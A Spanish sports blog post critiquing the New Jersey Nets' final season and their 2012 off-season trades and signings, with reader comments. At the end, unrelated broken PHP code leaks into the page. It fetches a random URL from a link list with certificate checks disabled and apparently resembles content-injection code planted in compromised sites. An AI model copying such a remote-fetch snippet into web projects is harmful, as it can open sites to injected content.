New Jersey Nets: Muy deficiente

04 de July de 2012 por TheDeerHunter

Bonita despedida de la franquicia a New Jersey. Un 33% de victorias, 24ºs en puntos anotados y encajados, 26ºs en rebotes, 22ºs en asistencias…  Epílogo acorde a la mediocridad de la etapa que termina.

La llegada de Deron Williams, aunque “rebotado” de Salt Lake City, prometía poner otro tipo de cimientos en la nueva franquicia de Brooklyn. Su figura sazonada con los millones del mecenas ruso y el potencial de la nueva sede debían generar el reclamo necesario para atraer a todos. Se supone que este verano deberíamos haber visto codazos por vestir la camiseta.

Sin embargo, pronto la realidad hizo acto de presencia: El entusiasmo de Deron por el nuevo proyecto no fue todo lo desbordante que cabría esperar; el señor Prokhorov ha estado más pendiente de sus frentes políticos en la madre Rusia que de otra cosa; Brook López se ha pasado casi todo el año lesionado; Kris Humphries ha destacado más en prensa rosa que en medios especializados; los ideales baloncestísticos de Avery Johnson son todo menos atractivos, y el grueso de la plantilla era una castaña de las gordas y todos éramos conscientes de ello. Estamos hablando de un equipo donde han sido importantes Shelden Williams y DeShawn Stevenson. La depresión hecha baloncesto. Los mejores mimbres para retener a Deron y, de paso, convencer a Dwight Howard de que sería una fantástica idea cambiar Orlando por Brooklyn. Porque sí.

Pero al final, como se ha demostrado este curso, al final todo se reduce a una sola cosa: Poner mucha pasta encima de la mesa. La mejor noticia del año puede haber sido que Putin gane las elecciones en su pueblo.

Algunos nos tirábamos las manos a la cabeza cuando se cambió la ronda de uno de los drafts más prometedores de los últimos años por el expiring de Gerald Wallace. A Wallace finalmente se le ha inyectado una ilusión de 40.000.000$ en cuatro años y ahora se da por hecho que llegará Joe Johnson a cambio de Farmar, Petro, Morrow, Jordan Williams, DeShawn y una ronda protegida del 2013. Habiendo dinero…

Es sólo el comienzo. Deron Williams súbitamente se muestra convencido de que Brooklin es el lugar donde quiere pasar los próximos 5 años (98 x 5 siempre ayudan y lo de los escarceos amorosos con Dallas era broma) y Dwight Howard ha sido desde pequeñito de los Nets. De corazón claro…

Adicionalmente se van añadiendo al proyecto otras piezas interesantes como Teletovic (15.7 x 3) y Reggie Evans. Un no parar.

En definitiva, que el curso de despedida de New Jersey… como si no hubiera existido. Todo está bien si acaba bien (¿o no?) y podría ser la bomba añadir a Howard. Al menos demuestran una ambición sin precedentes en aquellos lares, pero si yo fuera uno de esos mártires que pagó el pase de temporada el último año en New Jersey pediría que me devolvieran el dinero.

Lo mejor: Que el dinero del magnate ruso comienza a hacerse real.

Lo peor: Que la reconstrucción y la travesía por el desierto de los últimos años ha sido una total mentira.

Jugando a GM

Complicado añadir mucho más a la vorágine de las últimas horas. Hemos tenido que reescribir todo esto varias veces sin éxito. Comentamos alguna pincelada más.

– El nombre de Kirilenko ha sonado y sonará en Brooklyn. Parece destino seguro por más que la operación Wallace indicaba lo contrario. Eso sí, a ver lo que se va a dar por él, que tiene tendencia a llenar el cazo de forma escandalosa.

– Se asegura que Orlando aceptará un pack que incluya a Brook López, Humphries, Wallace, MarShon Brooks y alguna combinación de rondas. El traspaso es un pasote de los gordos, pero da la impresión que Billy King no tiene elección a estas alturas. All-in.

Comenta

7 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Decepcionantes el año pasado, son los grandes animadores del verano, nadie puede decir que el ruso no esta intentando por todos los medios sacar a los Nets de la mediocridad. Apuesta fuerte y arriesgada, pero mejor eso que ver a otros con dinero disponible no mover un dedo por mejorar el equipo y dar el siguiente paso.

      Citar

  2. Rompe dice:
    #2

    Increíble que al final los Hawks se liberen de la gran cagada de contrato que le hicieron a Jojo… Aunque no tan increíble que llegue a este tipo de equipos que quieren formar un “Big Three” de la nada y con “cualquier cosa”…

      Citar

  3. Esteban dice:
    #3

    el año pasado hicieron lo que pudieron con jugadores que aceptaron firmar por uin año, no eran muichos ni de gran calidad, pero aun asi no era un roster tan tan malo, deron-morrow-stevenson-humpries-lopez, pero la lesion de brook los mato, con el hubiese sido otra cosa, mas con lo que demostro cuando volvio, nada menos 38 puntos frente a dallas, en una victoria, marcando 28 en el siguiente encuentro, y con wallace y lopez huebiesen hasta ingresado a PO

    en fin, pasado pisado, y ahora a mirar el futuro

    ah, LO MEJOR, el regrso de green a la NBA, jugando su mejor temporada de profesional, quien lo diria noi?

    LO PEOR, la despedida de la liga de OKUR? las lesiones han hecho un lastre en un tio de verdadero nivel, una pena

      Citar

  4. Esteban dice:
    #4

    si se confirma todo y tienen en su equipo a deron, jo jo, wallace, teletovic, howard, kirilenko, green, evans

    mas que los BROOKLYN NETS, serian los BROOKLYN GOBLATROTERS

      Citar

  5. Jose Luis dice:
    #5

    No sé para qué quiere Orlando a Wallace, contratazo que evitará poder reconstruir. Aparte no puede ir Humpries a Orlando en un traspaso junto con Brook López porque no pueden hacerse dos sign and trades en un solo traspaso. Humpries iría a un tercer equipo.

      Citar

  6. Esteban dice:
    #6

    Exacto, no veo a wallace metido en ese traspaso con un contrato de 4 años, solo seria logico, si el magic mete por el a turkoglu y richarson, que serian de utilidad en los nets,

    La presion de howard q solo renovaria para los nets terminara llevandolo alli, aunque la oferta sea mala, el magic debio traspasarlo en otra oportunidad, ahora nadie lo querra si aviso que no renovara

    Los q deben estar q flipan son los rockets, se terminan metiendo en una reconstruccion por voluntad propia, al menos tendran 4 rookies de primera ronda este año si firman a montejunas

      Citar

  7. CAMPO2 dice:
    #7

    A JoJo de aqui a un par de años cuando se arrastre se le aplica una amnistia y a correr

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>